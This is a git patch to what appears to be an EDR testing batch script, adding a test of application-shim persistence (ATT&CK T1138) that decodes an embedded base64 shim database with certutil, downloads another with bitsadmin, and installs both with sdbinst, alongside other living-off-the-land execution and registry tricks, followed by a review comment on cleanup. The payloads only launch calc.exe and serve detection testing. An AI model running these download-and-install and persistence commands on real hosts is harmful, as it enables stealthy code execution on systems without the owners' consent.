From f16c22ccfad662fb3632c5b3a16351ee7bd3b083 Mon Sep 17 00:00:00 2001
From: op7ic <3172590+op7ic@users.noreply.github.com>
Date: Thu, 19 Jul 2018 12:49:00 +0100
Subject: [PATCH] shim test
---
Payloads/calc-exec.sdb | Bin 0 -> 1024 bytes
README.md | 4 ++--
runtests.bat | 52 ++++++++++++++++++++++++++++++++++++++++-
3 files changed, 53 insertions(+), 3 deletions(-)
create mode 100644 Payloads/calc-exec.sdb
diff --git a/Payloads/calc-exec.sdb b/Payloads/calc-exec.sdb new file mode 100644 index 0000000000000000000000000000000000000000..159c8277017ce487d1c95367a5bda330db21cf98 GIT binary patch literal 1024 zcmah{O=}ZT6uoaU=A)?+V-%69gBH}%gfwZ>#8pB}7g9B(sNMOdnM5KseIx}(M5%Ps zWmeLSpi4K3%jQSajfJkH;9B%2c4GZKi~y?2WaI( zCXiS9LXop-dmLChZ2| zWP-g>HFI`vxZ^;5N&4{iHq^ZLRKK*7n6bX_-pU++QPs$8d;H5X5>-S&=UKvL9P0V>Tw#0)Aoj`@A~A@c^P^gb{s%2WCed|Uc{ z+Wh!FTj(rq77iwFgw4;e$%uLkyG3*Y7}E>Dv-%y-sy@5(^|GQM1&+LPy3bm}mnqE? z!!j#+xKG>y?@uyr@g*5b(F`mN%W}=uec&sqQxklhJes2h{3PYz<-sLs7V0|KB)RZ1 z@RP`-!FY%~$>k8OP=Q`c&oN*f>gPb7F$*j~=~0zBv?di@>LPLxyR?exbyx@70;*hk z3Xdx<0&6mr|m-7-!?a;hYq*K8$((d+t#SIiA*qHBrYI8#pE2^obgW%20R6 z2)d|h!D~y!-4iQ5lS7Z8YU8>!dVy)oJU|D&XV9UIdmLJ#m&o#+tJ07Ep4{Pk%)?8| z%Vh8_{KW^aQ~Qs`p_`b=)92CKpu-b shim.64 +echo AgAAAAEAAABzZGJmAnjeAAAAA3ggAAAAAjgHcAM4AWAWQAEAAAABmAwAAABFWEUu >> shim.64 +echo Q0xBQ1IBAAADeA4AAAACOAdwAzgLYAGYAAAAAAN4DgAAAAI4B3ADOCBgAZgAAAAA >> shim.64 +echo A3gOAAAAAjgEcAM4AWABmAAAAAADeA4AAAACOA1wAzgVQAGYAAAAAAN4FAAAAAI4 >> shim.64 +echo EHADOAFgFkABAAAAAZgAAAAAA3gOAAAAAjgScAM4BpABmAAAAAADeBQAAAACOBJw >> shim.64 +echo AzgEkBZAAQAAAAGYAAAAAAN4GgAAAAI4B3ADOASQAZgMAAAAKrpBuRQxAq9SAQAA >> shim.64 +echo AXDgAAAAAVAJOgQMVR/UASJgBgAAAAFgHAAAACNAAQAAAAeQEAAAAO/VHM+BZc5A >> shim.64 +echo oCyA7S3ObrkCcAAAAAALcB4AAAABYHAAAAAJcAYAAAABYIAAAAAJcAYAAAABYLoA >> shim.64 +echo AAAHcH4AAAABYNgAAAAGYHAAAAAFYPAAAAAEkBAAAACpg6GdMzlyTIM54CQnCHDj >> shim.64 +echo CHAyAAAAAWAKAQAACWAUAQAAEGBGAQAAEWCWAQAAAlBqRLEdAQAGAANQakSxHQEA >> shim.64 +echo BgATYLoBAAAJcAwAAAABYLoAAAAIYNgAAAALcAYAAAABYBICAAABeCQCAAABiBAA >> shim.64 +echo AAAyAC4AMQAuADAALgAzAAAAAYhOAAAAewBjAGYAMQBjAGQANQBlAGYALQA2ADUA >> shim.64 +echo OAAxAC0ANAAwAGMAZQAtAGEAMAAyAGMALQA4ADAAZQBkADIAZABjAGUANgBlAGIA >> shim.64 +echo OQB9AAAAAYgKAAAAYwBhAGwAYwAAAAGINAAAAEEAZABkAFAAcgBvAGMAZQBzAHMA >> shim.64 +echo UABhAHIAYQBtAGUAdABlAHIAcwBGAGwAYQBnAHMAAAABiBgAAABSAGUAZABpAHIA >> shim.64 +echo 
ZQBjAHQARQBYAEUAAAABiBIAAABjAGEAbABjAC4AZQB4AGUAAAABiBQAAABNAGkA >> shim.64
+echo YwByAG8AcwBvAGYAdAAAAAGIBAAAACoAAAABiCwAAABNAGkAYwByAG8AcwBvAGYA >> shim.64
+echo dAAgAEMAbwByAHAAbwByAGEAdABpAG8AbgAAAAGISgAAAE0AaQBjAHIAbwBzAG8A >> shim.64
+echo ZgB0AK4AIABXAGkAbgBkAG8AdwBzAK4AIABPAHAAZQByAGEAdABpAG4AZwAgAFMA >> shim.64
+echo eQBzAHQAZQBtAAAAAYgeAAAANgAuADEALgA3ADYAMAAxAC4AMgAzADQAMAAzAAAA >> shim.64
+echo AYhSAAAANgAuADEALgA3ADYAMAAxAC4AMgAzADQAMAAzACAAKAB3AGkAbgA3AHMA >> shim.64
+echo cAAxAF8AbABkAHIALgAxADYAMAAzADIANQAtADAANgAwADAAKQAAAAGIEgAAAFYA >> shim.64
+echo aQBzAHQAYQBTAFAAMQAAAA== >> shim.64
+echo -----END CERTIFICATE----- >> shim.64
+start "" cmd /c certutil -f -decode shim.64 calc.sdb >nul
+start "" cmd /c sdbinst /q calc.sdb
+timeout 2
+start "" cmd /c sdbinst -u calc.sdb
+echo Execution Finished at %time% %date%
+echo Command Excuted: certutil -f -decode shim.64 calc.sdb
+echo Command Excuted: sdbinst -q calc.sdb
+echo Command Excuted: sdbinst -u calc.sdb
+
+timeout 5
+
+echo %time% %date% [+] T1138 - App Shim installation for Calc.exe via file download
+
+start "" cmd /c bitsadmin.exe /transfer "JobName" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/calc-exec.sdb "%cd%\calc2.sdb"
+start "" cmd /c sdbinst /q calc2.sdb
+timeout 2
+start "" cmd /c sdbinst -u calc2.sdb
+echo Execution Finished at %time% %date%
+echo Command Excuted: sdbinst -q calc2.sdb
+echo Command Excuted: sdbinst -u calc2.sdb
+
+timeout 5
+
 echo **********************************************
 echo * Testing LOLBAS PAYLOADS *
@@ -404,6 +452,7 @@ echo Execution Finished at %time% %date%
 echo Command Excuted: [InternetShortcut] > C:\windows\temp\url.url
 echo Command Excuted: URL=file:///c:\windows\system32\calc.exe >> C:\windows\temp\url.url
 echo Command Excuted: rundll32.exe shdocvw.dll, OpenURL C:\windows\temp\url.url
+
 timeout 5
 echo %time% %date% [+] Testing csc exec
@@ -666,7 +715,6 @@ echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pass.b6
 echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pass.b64
 echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= >> pass.b64
 echo -----END CERTIFICATE----- >> pass.b64
-
 start "" cmd /c certutil -f -decode pass.b64 pass_TestBin.exe >nul
 start "" cmd /c WseClientSvc.exe pass_TestBin.exe calc.exe
 echo Execution Finished at %time% %date%
@@ -866,6 +914,8 @@ start "" cmd /c del testADS.txt
 start "" cmd /c del C:\windows\temp\url.url
 start "" cmd /c del Default_File_Path2.ps1
 start "" cmd /c del notepad.msi
+start "" cmd /c del shim.64
+start "" cmd /c del calc2.sdb
 start "" cmd /c reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\paint.exe" /f
 start "" cmd /c reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\paint.exe" /f
 start "" cmd /c sc delete evilservice
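Review bot: The two `del` lines added in the cleanup hunk remove shim.64 and calc2.sdb but not calc.sdb, which the shim test earlier in this patch writes with `certutil -f -decode shim.64 calc.sdb`, so the decoded shim database is left behind in the working directory after the run. The matching `sdbinst -u` calls in that test are fire-and-forget (`start "" cmd /c`) with only a `timeout 2` after the install, so if an uninstall did not take, the calc.exe shim stays registered on the host, and because `sdbinst -u` is given the .sdb path it can no longer be removed by file once this cleanup has deleted it (only `sdbinst -u -g <GUID>` would remain). I would re-run the uninstall synchronously before the deletes and add the missing delete: `sdbinst -q -u calc.sdb`, `sdbinst -q -u calc2.sdb`, `start "" cmd /c del calc.sdb`. The cleanup section this hunk belongs to begins before the hunk.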